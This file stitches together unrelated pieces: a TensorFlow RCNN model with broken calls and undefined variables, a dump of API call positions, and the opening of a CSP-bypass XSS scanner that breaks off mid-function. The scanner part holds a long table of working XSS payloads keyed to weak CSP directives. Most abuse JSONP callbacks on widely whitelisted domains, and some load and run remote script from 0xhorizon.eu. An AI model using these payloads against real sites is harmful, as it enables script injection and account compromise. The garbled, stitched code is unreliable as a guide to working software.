"""RCNN model
"""
import tensorflow as tf
from define_scope import define_scope # custom decorators
class Model:
def __init__(self, X, y, output_size=None,
learning_rate=1e-5, learning_rate_decay=0.95,
reg=1e-5, dropout=0.5, verbose=False):
"""
Initalize the model.
Inputs:
- output_size: number of classes C
- learning_rate: Scalar giving learning rate for optimization.
- learning_rate_decay: Scalar giving factor used to decay the learning rate
after each epoch.
"""
self.X = X
self.y = y
self.learning_rate = learning_rate
self.learning_rate_decay = learning_rate_decay
self.dropout = dropout
# Store layers weight & bias
self.params = {
# input is [1, 9, 9, 1]
# 3x3 conv, 1 input, 8 outputs
'Wc1': tf.Variable(tf.random_normal([1, 1, 1, 32]), name='Wc1'),
# 3x3 conv, 8 inputs, 16 outputs
'Wc2': tf.Variable(tf.random_normal([3, 3, 32, 32]), name='Wc2'), # shared
# fully connected, 9*9*16 inputs, 512 outputs
'Wd1': tf.Variable(tf.random_normal([9 * 9 * 32, 32])),
# 512 inputs, 2 outputs (class prediction)
'Wout': tf.Variable(tf.random_normal([32, output_size])), # n_classes
# biases
'bc1': tf.Variable(tf.random_normal([32])),
'bc2': tf.Variable(tf.random_normal([32])),
'bd1': tf.Variable(tf.random_normal([32])),
'bout': tf.Variable(tf.random_normal([output_size])) # n_classes
}
# Instantiate functions once
# self.loss
# self.inference
# self.train
# self.predict
@define_scope
def inference(self):
"""
Setting up inference of model
Returns:
logits
"""
# Create some wrappers for simplicity
def conv2d(X, W, b, strides=1):
# Conv2D wrapper, with bias and relu activation
X = tf.nn.conv2d(X, W, strides=[1, strides, strides, 1], padding='SAME')
X = tf.nn.bias_add(X, b)
return tf.nn.relu(X)
def weight_variable(shape):
"""Create a weight variable with appropriate initialization."""
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"""Create a bias variable with appropriate initialization."""
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def variable_summaries(var, name):
"""Attach a lot of summaries to a Tensor."""
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.scalar_summary('mean/' + name, mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.scalar_summary('stddev/' + name, stddev)
tf.scalar_summary('max/' + name, tf.reduce_max(var))
tf.scalar_summary('min/' + name, tf.reduce_min(var))
tf.histogram_summary(name, var)
def nn_layer(input_tensor, input_dim, output_dim, layer_name, act=tf.nn.relu):
"""Rusable layer code for tensorboard naming
See: https://github.com/tensorflow/tensorflow/blob/r0.11/tensorflow/examples/tutorials/mnist/mnist_with_summaries.py
"""
with tf.name_scope(layer_name):
# This Variable will hold the state of the weights for the layer
with tf.name_scope('weights'):
weights = weight_variable([input_dim, output_dim])
variable_summaries(weights, layer_name + '/weights')
with tf.name_scope('biases'):
biases = bias_variable([output_dim])
variable_summaries(biases, layer_name + '/biases')
with tf.name_scope('Wx_plus_b'):
preactivate = tf.matmul(input_tensor, weights) + biases
tf.histogram_summary(layer_name + '/pre_activations', preactivate)
activations = act(preactivate, name='activation')
tf.histogram_summary(layer_name + '/activations', activations)
return activations
def conv_relu(input_tensor, kernel_shape, bias_shape):
# Create variable named "weights".
weights = tf.get_variable("weights", kernel_shape,
initializer=tf.random_normal_initializer())
# Create variable named "biases".
biases = tf.get_variable("biases", bias_shape,
initializer=tf.constant_initializer(0.0))
conv = tf.nn.conv2d(input_tensor, weights,
strides=[1, 1, 1, 1], padding='SAME')
return tf.nn.relu(conv + biases)
def board_filter(input_board):
with tf.variable_scope('conv1'):
relu1 = conv_relu(input_board, [3, 3, 32, 32], [32])
with tf.variable_scope('conv2'):
return conv_relu(relu1, [3, 3, 32, 32], [32])
# Unpack parameters
X = self.X
params = self.params
# Convolution Layer
with tf.variable_scope('conv1'):
conv1 = conv_relu(X, [1, 1, 1, 32], [32], 'conv1')
# conv1 = conv2d(X, params['Wc1'], params['bc1'])
# Convolution Layer
with tf.variable_scope('board_filters') as scope:
# conv2 = conv2d(conv1, params['Wc2'], params['bc2'])
result1 = board_filter(conv1, [3, 3, 32, 32], [32], 'conv2')
# Convolution Layer,
# Share weights within scope
scope.reuse_variables()
# conv3 = conv2d(conv2, params['Wc2'], params['bc2'])
result2 = board_filter(conv2, [3, 3, 32, 32], [32], 'conv3')
# with tf.variable_scope("foo"):
# v = tf.get_variable("v", [1])
# tf.get_variable_scope().reuse_variables()
# v1 = tf.get_variable("v", [1])
# assert v1 is v
# Fully connected layer
# Reshape conv2 output to fit fully connected layer input
fc1 = tf.reshape(conv3, [-1, 9 * 9 * 32])
fc1 = tf.add(tf.matmul(fc1, params['Wd1']), params['bd1'])
fc1 = tf.nn.relu(fc1)
# Apply Dropout
with tf.name_scope('dropout'):
tf.scalar_summary('dropout_keep_probability', self.dropout)
fc1 = tf.nn.dropout(fc1, self.dropout)
# Output, class prediction
# out = tf.add(tf.matmul(fc1, params['Wout']), params['bout'])
out = nn_layer(fc1, 32, 2, 'out', act=tf.identity)
return out
@define_scope
def train(self):
"""
Train
"""
with tf.name_scope('train'):
optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)
minimize = optimizer.minimize(self.loss)
return minimize
@define_scope
def loss(self):
"""
Cost
"""
with tf.name_scope('cross_entopy'):
diff = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.inference, labels=self.y)
with tf.name_scope('total'):
cross_entropy = tf.reduce_mean(diff)
tf.summary.scalar('cross_entropy', cross_entropy)
return cross_entropy
@define_scope
def predict(self):
"""
Predict
"""
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
correct_prediction = tf.nn.in_top_k(self.inference, self.y, 1)
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.scalar_summary('accuracy', accuracy)
return accuracy
| [
"tensorflow.nn.sparse_softmax_cross_entropy_with_logits",
"tensorflow.nn.dropout",
"tensorflow.reduce_mean",
"tensorflow.cast",
"tensorflow.reduce_min",
"tensorflow.random_normal",
"tensorflow.nn.in_top_k",
"tensorflow.random_normal_initializer",
"tensorflow.histogram_summary",
"tensorflow.matmul"... | [((5194, 5229), 'tensorflow.reshape', 'tf.reshape', (['conv3', '[-1, 9 * 9 * 32]'], {}), '(conv3, [-1, 9 * 9 * 32])\n', (5204, 5229), True, 'import tensorflow as tf\n'), ((5299, 5314), 'tensorflow.nn.relu', 'tf.nn.relu', (['fc1'], {}), '(fc1)\n', (5309, 5314), True, 'import tensorflow as tf\n'), ((6116, 6165), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""cross_entropy"""', 'cross_entropy'], {}), "('cross_entropy', cross_entropy)\n", (6133, 6165), True, 'import tensorflow as tf\n'), ((6501, 6540), 'tensorflow.scalar_summary', 'tf.scalar_summary', (['"""accuracy"""', 'accuracy'], {}), "('accuracy', accuracy)\n", (6518, 6540), True, 'import tensorflow as tf\n'), ((1717, 1785), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['X', 'W'], {'strides': '[1, strides, strides, 1]', 'padding': '"""SAME"""'}), "(X, W, strides=[1, strides, strides, 1], padding='SAME')\n", (1729, 1785), True, 'import tensorflow as tf\n'), ((1793, 1813), 'tensorflow.nn.bias_add', 'tf.nn.bias_add', (['X', 'b'], {}), '(X, b)\n', (1807, 1813), True, 'import tensorflow as tf\n'), ((1824, 1837), 'tensorflow.nn.relu', 'tf.nn.relu', (['X'], {}), '(X)\n', (1834, 1837), True, 'import tensorflow as tf\n'), ((1949, 1987), 'tensorflow.truncated_normal', 'tf.truncated_normal', (['shape'], {'stddev': '(0.1)'}), '(shape, stddev=0.1)\n', (1968, 1987), True, 'import tensorflow as tf\n'), ((1998, 2018), 'tensorflow.Variable', 'tf.Variable', (['initial'], {}), '(initial)\n', (2009, 2018), True, 'import tensorflow as tf\n'), ((2126, 2155), 'tensorflow.constant', 'tf.constant', (['(0.1)'], {'shape': 'shape'}), '(0.1, shape=shape)\n', (2137, 2155), True, 'import tensorflow as tf\n'), ((2166, 2186), 'tensorflow.Variable', 'tf.Variable', (['initial'], {}), '(initial)\n', (2177, 2186), True, 'import tensorflow as tf\n'), ((2343, 2382), 'tensorflow.scalar_summary', 'tf.scalar_summary', (["('mean/' + name)", 'mean'], {}), "('mean/' + name, mean)\n", (2360, 2382), True, 'import tensorflow as 
tf\n'), ((2479, 2522), 'tensorflow.scalar_summary', 'tf.scalar_summary', (["('stddev/' + name)", 'stddev'], {}), "('stddev/' + name, stddev)\n", (2496, 2522), True, 'import tensorflow as tf\n'), ((2638, 2669), 'tensorflow.histogram_summary', 'tf.histogram_summary', (['name', 'var'], {}), '(name, var)\n', (2658, 2669), True, 'import tensorflow as tf\n'), ((3540, 3602), 'tensorflow.histogram_summary', 'tf.histogram_summary', (["(layer_name + '/activations')", 'activations'], {}), "(layer_name + '/activations', activations)\n", (3560, 3602), True, 'import tensorflow as tf\n'), ((3966, 4039), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['input_tensor', 'weights'], {'strides': '[1, 1, 1, 1]', 'padding': '"""SAME"""'}), "(input_tensor, weights, strides=[1, 1, 1, 1], padding='SAME')\n", (3978, 4039), True, 'import tensorflow as tf\n'), ((4054, 4079), 'tensorflow.nn.relu', 'tf.nn.relu', (['(conv + biases)'], {}), '(conv + biases)\n', (4064, 4079), True, 'import tensorflow as tf\n'), ((4383, 4409), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""conv1"""'], {}), "('conv1')\n", (4400, 4409), True, 'import tensorflow as tf\n'), ((4550, 4584), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""board_filters"""'], {}), "('board_filters')\n", (4567, 4584), True, 'import tensorflow as tf\n'), ((5245, 5274), 'tensorflow.matmul', 'tf.matmul', (['fc1', "params['Wd1']"], {}), "(fc1, params['Wd1'])\n", (5254, 5274), True, 'import tensorflow as tf\n'), ((5340, 5364), 'tensorflow.name_scope', 'tf.name_scope', (['"""dropout"""'], {}), "('dropout')\n", (5353, 5364), True, 'import tensorflow as tf\n'), ((5369, 5428), 'tensorflow.scalar_summary', 'tf.scalar_summary', (['"""dropout_keep_probability"""', 'self.dropout'], {}), "('dropout_keep_probability', self.dropout)\n", (5386, 5428), True, 'import tensorflow as tf\n'), ((5438, 5470), 'tensorflow.nn.dropout', 'tf.nn.dropout', (['fc1', 'self.dropout'], {}), '(fc1, self.dropout)\n', (5451, 5470), True, 'import tensorflow as tf\n'), 
((5693, 5715), 'tensorflow.name_scope', 'tf.name_scope', (['"""train"""'], {}), "('train')\n", (5706, 5715), True, 'import tensorflow as tf\n'), ((5732, 5788), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': 'self.learning_rate'}), '(learning_rate=self.learning_rate)\n', (5754, 5788), True, 'import tensorflow as tf\n'), ((5910, 5939), 'tensorflow.name_scope', 'tf.name_scope', (['"""cross_entopy"""'], {}), "('cross_entopy')\n", (5923, 5939), True, 'import tensorflow as tf\n'), ((5951, 6039), 'tensorflow.nn.sparse_softmax_cross_entropy_with_logits', 'tf.nn.sparse_softmax_cross_entropy_with_logits', ([], {'logits': 'self.inference', 'labels': 'self.y'}), '(logits=self.inference,\n labels=self.y)\n', (5997, 6039), True, 'import tensorflow as tf\n'), ((6254, 6279), 'tensorflow.name_scope', 'tf.name_scope', (['"""accuracy"""'], {}), "('accuracy')\n", (6267, 6279), True, 'import tensorflow as tf\n'), ((767, 798), 'tensorflow.random_normal', 'tf.random_normal', (['[1, 1, 1, 32]'], {}), '([1, 1, 1, 32])\n', (783, 798), True, 'import tensorflow as tf\n'), ((871, 903), 'tensorflow.random_normal', 'tf.random_normal', (['[3, 3, 32, 32]'], {}), '([3, 3, 32, 32])\n', (887, 903), True, 'import tensorflow as tf\n'), ((999, 1033), 'tensorflow.random_normal', 'tf.random_normal', (['[9 * 9 * 32, 32]'], {}), '([9 * 9 * 32, 32])\n', (1015, 1033), True, 'import tensorflow as tf\n'), ((1105, 1140), 'tensorflow.random_normal', 'tf.random_normal', (['[32, output_size]'], {}), '([32, output_size])\n', (1121, 1140), True, 'import tensorflow as tf\n'), ((1191, 1213), 'tensorflow.random_normal', 'tf.random_normal', (['[32]'], {}), '([32])\n', (1207, 1213), True, 'import tensorflow as tf\n'), ((1238, 1260), 'tensorflow.random_normal', 'tf.random_normal', (['[32]'], {}), '([32])\n', (1254, 1260), True, 'import tensorflow as tf\n'), ((1285, 1307), 'tensorflow.random_normal', 'tf.random_normal', (['[32]'], {}), '([32])\n', (1301, 1307), True, 'import tensorflow as 
tf\n'), ((1333, 1364), 'tensorflow.random_normal', 'tf.random_normal', (['[output_size]'], {}), '([output_size])\n', (1349, 1364), True, 'import tensorflow as tf\n'), ((2281, 2307), 'tensorflow.name_scope', 'tf.name_scope', (['"""summaries"""'], {}), "('summaries')\n", (2294, 2307), True, 'import tensorflow as tf\n'), ((2320, 2339), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['var'], {}), '(var)\n', (2334, 2339), True, 'import tensorflow as tf\n'), ((2391, 2414), 'tensorflow.name_scope', 'tf.name_scope', (['"""stddev"""'], {}), "('stddev')\n", (2404, 2414), True, 'import tensorflow as tf\n'), ((2559, 2577), 'tensorflow.reduce_max', 'tf.reduce_max', (['var'], {}), '(var)\n', (2572, 2577), True, 'import tensorflow as tf\n'), ((2615, 2633), 'tensorflow.reduce_min', 'tf.reduce_min', (['var'], {}), '(var)\n', (2628, 2633), True, 'import tensorflow as tf\n'), ((2937, 2962), 'tensorflow.name_scope', 'tf.name_scope', (['layer_name'], {}), '(layer_name)\n', (2950, 2962), True, 'import tensorflow as tf\n'), ((4122, 4148), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""conv1"""'], {}), "('conv1')\n", (4139, 4148), True, 'import tensorflow as tf\n'), ((4215, 4241), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""conv2"""'], {}), "('conv2')\n", (4232, 4241), True, 'import tensorflow as tf\n'), ((6049, 6071), 'tensorflow.name_scope', 'tf.name_scope', (['"""total"""'], {}), "('total')\n", (6062, 6071), True, 'import tensorflow as tf\n'), ((6093, 6113), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['diff'], {}), '(diff)\n', (6107, 6113), True, 'import tensorflow as tf\n'), ((6289, 6324), 'tensorflow.name_scope', 'tf.name_scope', (['"""correct_prediction"""'], {}), "('correct_prediction')\n", (6302, 6324), True, 'import tensorflow as tf\n'), ((6351, 6392), 'tensorflow.nn.in_top_k', 'tf.nn.in_top_k', (['self.inference', 'self.y', '(1)'], {}), '(self.inference, self.y, 1)\n', (6365, 6392), True, 'import tensorflow as tf\n'), ((6401, 6426), 'tensorflow.name_scope', 
'tf.name_scope', (['"""accuracy"""'], {}), "('accuracy')\n", (6414, 6426), True, 'import tensorflow as tf\n'), ((3042, 3066), 'tensorflow.name_scope', 'tf.name_scope', (['"""weights"""'], {}), "('weights')\n", (3055, 3066), True, 'import tensorflow as tf\n'), ((3191, 3214), 'tensorflow.name_scope', 'tf.name_scope', (['"""biases"""'], {}), "('biases')\n", (3204, 3214), True, 'import tensorflow as tf\n'), ((3323, 3349), 'tensorflow.name_scope', 'tf.name_scope', (['"""Wx_plus_b"""'], {}), "('Wx_plus_b')\n", (3336, 3349), True, 'import tensorflow as tf\n'), ((3417, 3483), 'tensorflow.histogram_summary', 'tf.histogram_summary', (["(layer_name + '/pre_activations')", 'preactivate'], {}), "(layer_name + '/pre_activations', preactivate)\n", (3437, 3483), True, 'import tensorflow as tf\n'), ((3791, 3821), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {}), '()\n', (3819, 3821), True, 'import tensorflow as tf\n'), ((3926, 3954), 'tensorflow.constant_initializer', 'tf.constant_initializer', (['(0.0)'], {}), '(0.0)\n', (3949, 3954), True, 'import tensorflow as tf\n'), ((6458, 6497), 'tensorflow.cast', 'tf.cast', (['correct_prediction', 'tf.float32'], {}), '(correct_prediction, tf.float32)\n', (6465, 6497), True, 'import tensorflow as tf\n'), ((2452, 2473), 'tensorflow.square', 'tf.square', (['(var - mean)'], {}), '(var - mean)\n', (2461, 2473), True, 'import tensorflow as tf\n'), ((3370, 3402), 'tensorflow.matmul', 'tf.matmul', (['input_tensor', 'weights'], {}), '(input_tensor, weights)\n', (3379, 3402), True, 'import tensorflow as tf\n')] |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# Author : @Ruulian_
# Date created : 31 Oct 2021
from random import choice
from requests_html import HTMLSession
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from urllib.parse import urljoin, urlparse
import argparse
import datetime
import json
import platform
import re
import time
import urllib3
# Self-signed / invalid certificates are common on pentest targets, so
# silence urllib3's InsecureRequestWarning noise (requests are made with
# verify=False unless --secure is passed).
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Random ANSI color code (magenta / bright yellow / yellow) used for the banner.
color = choice([35, 93, 33])
# Regex matching a CSP "nonce-<base64>" source expression.
nonce_reg = r'nonce\-(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?'
# Regex matching a CSP "sha<3 digits>-<base64>" (hash) source expression.
sha_reg = r'sha\d{3}\-(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?'
# JavaScript snippet embedded in every payload to prove code execution.
general_payload = "alert()"
# CSP directive fallbacks: when 'script-src' is absent, 'default-src'
# governs script loading instead (used by Page.scan()).
policies_fallback = {
    "script-src":"default-src"
}
# Known-bypassable CSP configurations, keyed by directive.  Each entry:
#   'value'  : source-list tokens that must ALL be present for the bypass,
#   'patch'  : (directive, regex) pairs that neutralise the bypass when one
#              matches (e.g. a nonce/hash makes 'unsafe-inline' ignored),
#   'payload': proof-of-concept markup (mostly JSONP endpoints hosted on
#              commonly-whitelisted domains) that runs `general_payload`.
vulnerable_CSP_conf = {
    "script-src" : [
        {'value': ['unsafe-inline'], 'patch':[('script-src', nonce_reg), ('script-src', sha_reg)], 'payload': f'<script>{general_payload}</script>'},
        {'value': ['unsafe-inline'], 'patch':[('script-src', nonce_reg), ('script-src', sha_reg)], 'payload': f'<img src=# onerror={general_payload}>'},
        {'value': ['*'], 'patch':[], 'payload': '<script src="https://0xhorizon.eu/cspass/exploit.js"></script>'},
        {'value': ['data:'], 'patch':[], 'payload': f'<script src="data:,{general_payload}"></script>'},
        {'value':['https://cdnjs.cloudflare.com', 'unsafe-eval'], 'patch':[], 'payload':"<script src=\"https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js\"></script><div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };%s;//');}} </div>" % general_payload},
        {'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback={general_payload}"></script>'},
        {'value': ['https://*.doubleclick.net'], 'patch':[], 'payload': f'"><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback={general_payload}"></script>'},
        {'value': ['https://*.googleadservices.com'], 'patch':[], 'payload': f'"><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback={general_payload}"></script>'},
        {'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback={general_payload}"></script>'},
        {'value': ['https://*.google.com'], 'patch':[], 'payload': f'"><script src="https://accounts.google.com/o/oauth2/revoke?callback={general_payload}"></script>'},
        {'value': ['https://*.blogger.com'], 'patch':[], 'payload': f'"><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback={general_payload}"></script>'},
        {'value': ['https://*.yandex.net'], 'patch':[], 'payload': f'"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback={general_payload}"></script>'},
        {'value': ['https://*.yandex.ru'], 'patch':[], 'payload': f'"><script src="https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback={general_payload}"></script>'},
        {'value': ['https://*.vk.com'], 'patch':[], 'payload': f'"><script src="https://api.vk.com/method/wall.get?callback={general_payload}"></script>'},
        {'value': ['https://*.marketo.com'], 'patch':[], 'payload': f'"><script src="http://app-sjint.marketo.com/index.php/form/getKnownLead?callback={general_payload}"></script>'},
        {'value': ['https://*.marketo.com'], 'patch':[], 'payload': f'"><script src="http://app-e.marketo.com/index.php/form/getKnownLead?callback={general_payload}"></script>'},
        {'value': ['https://*.alicdn.com'], 'patch':[], 'payload': f'"><script+src="https://detector.alicdn.com/2.7.3/index.php?callback={general_payload}"></script>'},
        {'value': ['https://*.taobao.com'], 'patch':[], 'payload': f'"><script+src="https://suggest.taobao.com/sug?callback={general_payload}"></script>'},
        {'value': ['https://*.tbcdn.cn'], 'patch':[], 'payload': f'"><script+src="https://count.tbcdn.cn//counter3?callback={general_payload}"></script>'},
        {'value': ['https://*.1688.com'], 'patch':[], 'payload': f'"><script+src="https://bebezoo.1688.com/fragment/index.htm?callback={general_payload}"></script>'},
        {'value': ['https://*.amap.com'], 'patch':[], 'payload': f'"><script+src="https://wb.amap.com/channel.php?callback={general_payload}"></script>'},
        {'value': ['https://*.sm.cn'], 'patch':[], 'payload': f'"><script+src="http://a.sm.cn/api/getgamehotboarddata?format=jsonp&page=1&_=1537365429621&callback={general_payload};jsonp1"></script>'},
        {'value': ['https://*.sm.cn'], 'patch':[], 'payload': f'"><script+src="http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3b{general_payload}%2f%2f794"></script>'},
        {'value': ['https://*.uber.com'], 'patch':[], 'payload': f'"><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback={general_payload};"></script>'},
        {'value': ['https://*.buzzfeed.com'], 'patch':[], 'payload': f'"><script src="https://mango.buzzfeed.com/polls/service/editorial/post?poll_id=121996521&result_id=1&callback={general_payload}%2f%2f"></script>'},
        {'value': ['https://*.co.jp'], 'patch':[], 'payload': f'"><script src=https://mempf.yahoo.co.jp/offer?position=h&callback={general_payload}//></script>'},
        {'value': ['https://*.yahooapis.jp'], 'patch':[], 'payload': f'"><script src=https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback={general_payload}//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback={general_payload}//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3b{general_payload}%2f%2f476&_=1537149044679"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback={general_payload};//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://api.cmi.aol.com/catalog/cms/help-central-usaol-navigation-utility?callback={general_payload};//jQuery20108887725116629929_152807105037740504&_=1528071050378"></script>'},
        {'value': ['https://*.yahoo.com'], 'patch':[], 'payload': f'">x<script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?locale=en_us&agentVersion=205&adTrackingEnabled=true&adUnitCode=2e268534-d01b-4616-83cd-709bd90690e1&apiKey=P3VYQ352GKX74CFTRH7X&gdpr=false&euconsent=&publisherUrl=https%3A%2F%2Fwww.autoblog.com&cb={general_payload};"></script>'},
        {'value': ['https://*.yahoo.com'], 'patch':[], 'payload': f'"><script src="https://search.yahoo.com/sugg/gossip/gossip-us-ura/?f=1&.crumb=wYtclSpdh3r&output=sd1&command=&pq=&l=1&bm=3&appid=exp-ats1.l7.search.vip.ir2.yahoo.com&t_stmp=1571806738592&nresults=10&bck=1he6d8leq7ddu%26b%3D3%26s%3Dcb&csrcpvid=8wNpljk4LjEYuM1FXaO1vgNfMTk1LgAAAAA5E2a9&vtestid=&mtestid=&spaceId=1197804867&callback={general_payload}"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback={general_payload}//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="https://ui.comet.aol.com/?module=header%7Cleftnav%7Cfooter&channel=finance&portfolios=true&domain=portfolios&collapsed=1&callback={general_payload}//jQuery21307555521146732187_1538371213486&_=1538371213487"></script>'},
        {'value': ['https://*.aol.com'], 'patch':[], 'payload': f'"><script+src="http://portal.pf.aol.com/jsonmfus/?service=myportfolios,&porttype=1&portmax=100&callback={general_payload}//jQuery1710788849030856973_1538354104695&_=1538354109053"></script>'},
        {'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="http://search.twitter.com/trends.json?callback={general_payload}"></script>'},
        {'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="https://twitter.com/statuses/user_timeline/yakumo119info.json?callback={general_payload}"></script>'},
        {'value': ['https://*.twitter.com'], 'patch':[], 'payload': f'"><script+src="https://twitter.com/status/user_timeline/kbeautysalon.json?count=1&callback={general_payload}"></script>'},
        {'value': ['https://*.sharethis.com'], 'patch':[], 'payload': f'"><script+src="https://www.sharethis.com/get-publisher-info.php?callback={general_payload}"></script>'},
        {'value': ['https://*.addthis.com'], 'patch':[], 'payload': f'"><script+src="https://m.addthis.com/live/red_lojson/100eng.json?callback={general_payload}"></script>'},
        {'value': ['https://*.ngs.ru'], 'patch':[], 'payload': f'"><script+src="https://passport.ngs.ru/ajax/check?callback={general_payload}"></script>'},
        {'value': ['https://*.ulogin.ru'], 'patch':[], 'payload': f'"><script+src="https://ulogin.ru/token.php?callback={general_payload}"></script>'},
        {'value': ['https://*.meteoprog.ua'], 'patch':[], 'payload': f'"><script+src="https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback={general_payload}"></script>'},
        {'value': ['https://*.intuit.com'], 'patch':[], 'payload': f'"><script+src="https://appcenter.intuit.com/Account/LogoutJSONP?callback={general_payload}"></script>'},
        {'value': ['https://*.userlike.com'], 'patch':[], 'payload': f'"><script+src="https://api.userlike.com/api/chat/slot/proactive/?callback={general_payload}"></script>'},
        {'value': ['https://*.youku.com'], 'patch':[], 'payload': f'"><script+src="https://www.youku.com/index_cookielist/s/jsonp?callback={general_payload}"></script>'},
        {'value': ['https://*.mixpanel.com'], 'patch':[], 'payload': f'"><script+src="https://api.mixpanel.com/track/?callback={general_payload}"></script>'},
        {'value': ['https://*.travelpayouts.com'], 'patch':[], 'payload': f'"><script+src="https://www.travelpayouts.com/widgets/50f53ce9ada1b54bcc000031.json?callback={general_payload}"></script>'},
        {'value': ['https://*.pictela.net'], 'patch':[], 'payload': f'"><script+src="http://ads.pictela.net/a/proxy/shoplocal/alllistings/d5dadac1578db80a/citystatezip=10008;pd=40B5B0493316E5A3D4A389374BC5ED3ED8C7AB99817408B4EF64205A5B936BC45155806F9BF419E853D2FCD810781C;promotioncode=Petco-140928;sortby=23;listingimageflag=y;listingimagewidth=300;resultset=full;listingcount=100;;callback={general_payload};/json"></script>'},
        {'value': ['https://*.adtechus.com'], 'patch':[], 'payload': f'"><script+src="https://adserver.adtechus.com/pubapi/3.0/9857.1/3792195/0/170/ADTECH;noperf=1;cmd=bid;bidfloor=0.12;callback={general_payload};//window.proper_d31c1edc_57a8d6de_38"></script>'},
        {'value': ['https://*.googleapis.com'], 'patch':[], 'payload': '"><embed src=\'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain="})))}catch(e){%s}//\' allowscriptaccess=always>' % general_payload},
        {'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>'},
        {'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'ng-app"ng-csp ng-click=$event.view.{general_payload}><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>'},
        {'value': ['https://*.googleapis.com'], 'patch':[], 'payload': f'<script src=https://www.googleapis.com/customsearch/v1?callback={general_payload}'},
        {'value': ['unsafe-inline', '*'], 'patch':[], 'payload':f"<script>script=document.createElement('script');script.src='//0xhorizon.eu/cspass/exploit.js';window.frames.document.head.appendChild(script);</script>"}
    ]
}
def date_formatted():
    """Return the current local time as an ``HH:MM:SS`` string (used as a log prefix)."""
    now = datetime.datetime.now()
    return now.strftime("%H:%M:%S")
def parse_cookies(arg: str) -> dict:
    """Parse a ``key=value`` cookie string into a dict (argparse ``type=`` callable).

    Fixes over the previous version:
    - each segment is split on the FIRST ``=`` only, so values that themselves
      contain ``=`` (e.g. base64 session tokens) are kept intact;
    - empty segments (trailing or doubled ``;``) are ignored instead of
      raising a spurious error;
    - surrounding whitespace around each segment is stripped.

    :param arg: raw cookie string, e.g. ``"session=abc; theme=dark"``
    :raises argparse.ArgumentTypeError: if a non-empty segment has no ``=``
    :return: mapping of cookie names to values
    """
    cookies = {}
    for segment in arg.split(";"):
        segment = segment.strip()
        if not segment:
            # Tolerate trailing/duplicated separators.
            continue
        name, sep, value = segment.partition("=")
        if not sep:
            raise argparse.ArgumentTypeError("Cookies must be specified with key=value")
